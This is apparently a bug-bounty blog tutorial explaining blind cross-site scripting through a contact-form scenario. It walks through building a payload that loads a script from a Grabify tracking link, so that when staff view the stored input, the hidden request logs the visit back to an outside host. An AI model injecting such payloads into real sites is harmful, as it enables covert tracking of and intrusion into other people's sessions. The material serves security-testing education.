Bug Bounty: Blind XSS Payloads Explained
This article was originally posted on bepractical.tech
Hi everyone! In this article, you will learn about how to craft blind xss payloads to get yourself bounties. Before we dive deep in this article, let us first learn about some few things:
What is XSS(Cross Site Scripting)?
What is Blind XSS?
A/Q Acunetix, “Blind XSS vulnerabilities are a variant of persistent XSS vulnerabilities. They occur when the attacker input is saved by the web server and executed as a malicious script in another part of the application or in another application”
In other variants of XSS, we can see the reflected input in the response. However, this is not the case in the blind XSS. Therefore, we need a different approach in order to find this blind xss.
You can learn more about finding xss vulnerability over here
A Simple Blind XSS Scenario:
Let’s say there is a website contactme.com. The website contains a contact us page. There we have a form with three fields Name, Email Address and Phone Number. On submitting the form, we see a message “Thank you for contacting us. We will be in touch with you within 24 hrs”. After that, someone from the company logs into their account and sees your details. Using the details, they contact you for further assistance.
Now in this case, no matter what we are providing in the form the only response we will get from the backend is “Thank you for contacting us. We will be in touch with you within 24 hrs”. So here, we cannot use our old payloads to verify the vulnerability. Instead, we need to craft a different payload. Let’s see how we can do that.
CRAFTING PAYLOAD FOR BLIND XSS
Let’s try to create a very simple payload for xss i.e <script>alert(1)</script>. We all know that it will pop an alert once get rendered. But in blind xss, we won’t be able to see the popup. So, we need to think of a payload which we can use to see the output of the response body.
In this article, we are going to use the payload below:
BLIND XSS WITH GRABIFY
Now, let us try to craft a payload with grabify. Follow the steps below:
1- Open Grabify.
2- Type any url here(google.com) and click on “Create URL”.
3- After that, you will see a screen similar to this:
4- Now, Copy the link of “New URL” and paste it inside your payload: <script src=”https://grabify.link/9P0OX8″></script> and use this in the vulnerable web application. If the website is vulnerable, you will see something like below:
Now if we use this payload in the example above, we can successfully achieve blind xss if vulnerable. It is because once someone from the company try to see your details. The xss payload will be executed and you will see the data as shown in the picture.
I hope you understand how we can create blind xss payloads. If you have any doubts or issue then feel free to comment down below.
Join our telegram channel over here for latest ethical hacking/cybersecurity updates.
Some More Blind XSS Reference:
Check out some of our latest cybersecurity courses:
Course Name: Bug Bounty: The Ultimate Guide to Hunt Account Takeover(2022)
Course Rating: 4.5
Course Link: Click Here
Course Name: Hacking Windows With Python From Scratch(2022)
Course Rating: 4.4
Course Link: Click Here